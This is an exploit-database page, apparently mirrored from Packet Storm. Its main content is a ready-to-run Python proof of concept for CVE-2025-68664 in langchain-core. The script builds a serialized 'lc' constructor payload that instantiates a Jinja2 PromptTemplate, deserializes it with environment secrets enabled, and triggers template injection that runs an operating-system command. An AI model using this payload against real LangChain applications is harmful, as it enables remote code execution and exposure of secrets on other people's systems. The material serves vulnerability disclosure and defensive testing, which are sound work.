Lucene search
K

๐Ÿ“„ LangChain Core Insecure Deserialization

๐Ÿ—“๏ธย 05 May 2026ย 00:00:00Reported byย Mohammed Idrees BanyamerTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 65ย Views

LangChain Core insecure deserialization allows SSTI and remote code execution via a malicious PromptTemplate.

Related
Code
# Exploit Title: LangChain Core - SSTI/RCE 
    # Date: 2025-12-29
    # Exploit Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Contact: @banyamer_security (Instagram)
    # GitHub: https://github.com/mbanyamer
    # Vendor Homepage: https://www.langchain.com/
    # Software Link: https://pypi.org/project/langchain-core/
    # Version: < 0.3.81 and < 1.2.5
    # Tested on: Python 3.10 - 3.12
    # CVE : CVE-2025-68664
    # Description: Exploits unsafe deserialization in langchain_core.load to instantiate a malicious PromptTemplate
    #              with Jinja2 format, leading to Server-Side Template Injection and arbitrary command execution.
    
    import os
    from langchain_core.load import dumps, load
    from langchain_core.prompts import PromptTemplate
    
    # Set a dummy env var (demonstrates potential secret access if needed)
    os.environ["TEST_SECRET"] = "secret_value_123"
    
    # Malicious constructor payload targeting PromptTemplate with SSTI
    payload = {
        "exploit": {
            "lc": 1,
            "type": "constructor",
            "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
            "kwargs": {
                "input_variables": [],
                "template": "{{ config.get('callbacks', {}).get('__builtins__', {}).get('__import__', lambda x: __import__(x))('os').system('id') }}",
                "template_format": "jinja2"
            }
        }
    }
    
    # Serialize (dumps does not escape 'lc' key)
    serialized = dumps(payload)
    
    # Deserialize - instantiates the malicious PromptTemplate
    deserialized = load(serialized, secrets_from_env=True)
    
    # Extract and invoke the malicious prompt โ†’ triggers SSTI โ†’ RCE
    malicious = deserialized["exploit"]
    output = malicious.format()
    
    print("[*] Command execution output:")
    print(output)

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation